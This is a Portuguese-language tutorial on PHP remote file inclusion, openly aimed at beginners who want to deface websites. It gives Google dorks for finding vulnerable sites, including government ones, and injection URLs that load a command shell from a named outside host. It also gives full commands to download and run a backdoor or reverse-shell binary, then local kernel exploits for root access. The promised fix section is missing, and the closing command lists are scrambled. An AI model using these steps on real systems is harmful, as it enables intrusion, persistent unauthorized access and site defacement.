Tutorial de php injection
1) Introdução
Já que muita gente pede ajuda sobre php injection, resolvi fazer
um tutorial de simples entendimento pra facilitar a vida da galera new.
Esta falha consiste em usuários incluirem scripts no codigo php da
vitima e este ser executado. Quando corretamente utilizado, que é o que
explicarei nesse tutorial, o intruso pode setar comandos ao servidor.
Boa parte do processo pode ser feito pelo próprio browser (IE,
mozilla, netscape...).
Tentarei explicar como procura, explora e corrige o bug. Espero
ser util para todos ;)
Obs1.: Este tutorial foi feito para explicar uma das maneiras utilizadas
por pessoas para desfigurar sites mas pode ser utlizado para outros fins.
Vai da cabeça de cada um :P
Obs2.: No final, terão urls com os programas citados.
2) O que é o que
Vitima : Site que você irá explorar a falha de php.
String : Arquivos no site suceptiveis ao ataque.
Cmd : Script em PHP que nos possibilita digitar
comandos a serem incluidos no php.
Backdoor : Abre portas no sistema para conexão remota 'sem
autenticação'.
Connect Back : Abre uma porta especifica para conexao entre seu
pc e a vitima.
Exploit : Programa que explora certa falha num sistema.
Há vários tipos de Exploits. Aqui, iremos
tratar apenas com Local Root Exploits. (exploram
falhas localmente que levam usuários comuns a
acesso root - super-usuário -)
Shell : É um programa interpretador de comandos que
permite ao usuário iteragir com o sistema
operacional através de comandos digitados.
Telnet : Utilizaremos para conexões remotas.
Firewall : É uma barreira inteligente entre uma rede local
e a Internet, através da qual só passa tráfego
autorizado. Este tráfego é examinado pelo
firewall em tempo real e a seleção é feita de
acordo com a regra."o que não foi expressamente
permitido, é proibido"
root : Super-usuário. É o admin... tem acesso total ao
sistema.
------------------- No browser
3) Strings
Há várias strings disponíveis. Neste tutorial, irei utilizar para
exemplos uma bem simples que é " index.php?page= ". Em anexo, no final,
várias outras :P
4) Sintaxe
Ex.:
www.site.com /arquivo.php?data= http://cmd/cmd.gif?&cmd= ls
^ ^ ^ ^
Vitima String CmD comando unix
P.S.: Sem os espaços.
5) Procurando site vulnerável.
Uma excelente ferramente para os kiddies, sem dúvida, é o google.
Há várias maneiras de fazer buscas por ele, dentre elas:
Obs.: A palavra 'word' q irei citar aqui é qualquer coisa que você esteja
procurando no sistema de busca.
word : Busca por sites q contenham a 'word' em qualquer
lugar da pagina.
allinurl: : Sites que contenham na url a word citada. Ex:
www.site.com/forum/word.php?id=0 .
allintitle: : Restringe sua pesquisa ao título da página.
intitle: : Parecido com o de cima, para maiores
esclarecimentos no final do tuto.
inanchor: : Busca nos links dentro co corpo dos sites. href="PROCURA AQUI DENTRO"> site: : Procura sites de um determinado domínio. Ex: site:br <- procura sites .br link: : Sites que contenham links para um outro determinado site. Ex: link:www.securityfocus.com filetype: : Filtra por extensões de arquivos. Ex: filetype:php <- procura apenas urls .php Essas dicas devem ser uteis não apenas na busca de sites vulneraveis, mas também nas buscas comuns para você ;) Utilizando a string "index.php?page=" para sites .gov --> allinurl:index.php?page= site:gov Fácil.. . Você também pode usar um scanner pra tornar o processo mais eficiente. kieger (membro do r00t_System grouP) codou um em perl: Procura com o sistema do google, testa e imprime os vulneraveis num arquivo. Código no final do tutorial. 6) Utilizando a CmD 6.1) Incluindo Cmd = http://rootsystem.100free.com/cmd/cse.gif?&cmd= (coded by Crash from datacha0s group.) No resultado, insira a cmd na string. Ex: www.site.com/index.php?page=http://rootsystem.100free.com/cmd/cs e.gif?&cmd= Não tem mistério. 6.2) A Cmd datacha0s - PHP Command/Safemode Exploit System Information sysname: --> Sistema operacional rodando. nodename: --> Nome local. release: --> Versão do kernel. Script Current User: --> Usuário pelo qual o script está sendo executado. PHP Version: --> Versão do php da máquina User Info: --> Informação do user (uid, euid, gid). Current Path: --> Pasta atual que você está no server. Server IP: --> Ip do servidor. Web Server: --> Informações sobre o servidor. [*] Command Mode Run Command Stdout (( aqui ficarao os resultados dos comandos )) (( inseridos na cmd )) Obs.: O script varia de cmd a cmd. Este é apenas um exemplo. 7) Ganhando acesso a shell Para os próximos passos, você precisa estar na shell (interpretador de comandos) da máquina. Para isto, explicarei duas maneiras de tornar isto possível: Backdoor e Connect Back. 7.1) Rodando backdoor no server para conexão remota Para rodar um backdoor, basta fazer um upload, escolher permissões, e executá-lo. Comando: cd /var/tmp;wget www.site.onde.está.o.backdoor.com/backd oor;chmod 777 backdoor;./backdoor cd /var/tmp -> Faz a operação nesta pasta, por ser comum a todos os usuários e devido às suas permissões. /tmp tb serve :) wget www.(...)/backdoor -> Copia o backdoor a partir de uma url para o site. Quando wget não funcionar, tente outros comandos. Sintaxes: wget www.site.com/arquivo lynx -source www.site.com/arquivo > arquivo curl -o arquivo www.site.com/arquivo GET www.site.com/arquivo > arquivo (...) Após feito isso, aparecerá a seguinte mensagem: Daemon Working... pid = XXXXX Isto significa que o backdoor está rodando. Agora, basta conectar-se à shell. Como? No Win: Iniciar -> Executar -> telnet www.site.com porta Onde o www.site.com recebe o nome ou ip do site que você rodou o backdoor e porta é a porta que o backdoor está trabalhando. Se aparecer no telnet bash-2.05b$ ou algo parecido, é porque funcionou! E você tem acesso à shell na máquina! Se demorar um tempo e não cair na shell, confira o nome/ip do server.. se estiver correto, ele está rodando Firewall. E agora? simples, Connect Back. :P 7.2) Connect Back Método muito eficiente para ganhar shell numa máquina. Ganha shell reversamente. Windows: Baixe o netcat para windows e no Prompt do MSDOS (na pasta que o nc se encontra), digite: nc -vv -l -p 15 , onde 15 pode ser escolhido de acordo com sua preferência. Esta porta será a que realizará a conexão. Agora, voltando para o browser, na cmd digite o seguinte comando: cd /var/tmp;wget www.site.do.dc.com/dc;chmod 777 dc;./dc IP porta cd /var/tmp -> Mesmo que para backdoor. wget www.site.do.dc.com/dc -> | | | | , mas é logico, com o endereço da dc. ./dc IP porta -> onde IP é o SEU IP e porta é a porta que você escolheu no netcat. Feito isso, se ocorrer tudo certo, aparecerá como resultado: Connect Back Backdoor [*] Dumping Arguments [*] Resolving Host Name [*] Connecting... [*] Spawning Shell [*] Detached Isto significa que você se conectou na shell! ;) Agora, vá para o MSDOS e vamos para o próximo passo. Se aparecer Connect Back Backdoor [*] Dumping Arguments [*] Resolving Host Name [*] Connecting... [-] Unable to Connect confira os dados (seu ip, porta, netcat, etc). Se insistir, sua rede não aceita este tipo de conexão. Tente outras portas (como 80, 22, 15, etc). ---------------------------------- Na Shelll 8) Comandos básicos Eu ia passar direto nessa parte, mas sei que muitos não conhecem os comandos unix. Então vamos conhecer alguns: ls -> Lista arquivos. Pode ser combinado com -a (mostra ocultos) e -l (mostra detalhadamente). Ex: ls -la (mostra detalhadamente os arquivos, inclusive ocultos). uname -a -> Mostra informações do sistema, como versão do kernel, nome, e outras coisas uteis. id -> Mostra sua id. os arquivos setados, inclusive pastas mkdir -> Cria diretorio Salvando resultados em arquivos comando > /arquivo/onde/será/armazenado Ex: ls /etc > /tmp/s.txt salva todo o resultado da listagem de /etc no arquivo /tmp/s.txt Adicionando linhas em arquivos echo ' linha ' >> /arquivo/onde/será/incluido Descompactando arquivos (os mais comuns) .tar -> tar xvf arquivo.tar Compactando arquivos (os mais comuns) .tar -> tar cvf destino.tar ARQUIVO 9) Ganhando acesso root Para ganhar acesso root localmente numa máquina, vai depender muito. Você precisa de um exploit local e o sistema deve estar vulnerável. Simples, basta baixar, escolher as permissões e executar.. assim como você faz com o backdoor.. mas isto você faz na shell. Os mais comuns no momento são mremap , brk e kmod para kernel abaixo de 2.4.24 Se tudo ocorrer corretamente rootando a máquina, ao digitar o comando "id" você verá bash-2.05b# id uid=0(root) gid=0(root) Pronto! Você é root! Divirta-se ;)
w -> Lista os usuários logados no momento.
cp -> Copia arquivos. Sintaxe: cp arquivo /destino/
mv -> Move arquivos. Sintexe: mv arquivo /destino/
rm -> Remove arquivos. Se combinado com -rf , remove todos
rmdir -> Exclui diretorio
find -> Procura por arquivos/pastas. Ex: " find /etc -name
httpd.conf " procura pelo httpd.conf na pasta /etc
pwd -> Mostra em que pasta você está localizado
cat -> Exibe o conteúdo de um arquivo na tela
head -> Exibe linhas do início do arquivo
tail -> || || || final do arquivo
ctrl+c -> Sai/killa um programa
ctrl+r -> Busca comando digitado no history do bash
ps -auxw -> Lista todos os processos do sistema
netstat -na -> Status da conexão
kill -9 -> Mata processo. Sintaxe: kill -9 PID DO PROCESSO
kill -HUP -> Reinicia processo. Sintaxe: kill -HUP ID DO PROCESSO
pico -> Editor de texto. Sintaxe: pico arquivo
vi -> | | vi arquivo
.tar.gz -> tar zxvf arquivo.tar.gz
.tar.bz2 -> tar jxvf arquivo.tar.bz2
.zip -> unzip arquivo.zip
.tar.gz -> tar cvf destino.tar ARQUIVO | gzip destino.tar
.tar.bz2 -> tar cvf destino.tar ARQUIVO | bzip2 destino.tar
Do Melhor
Linkk
del.icio.us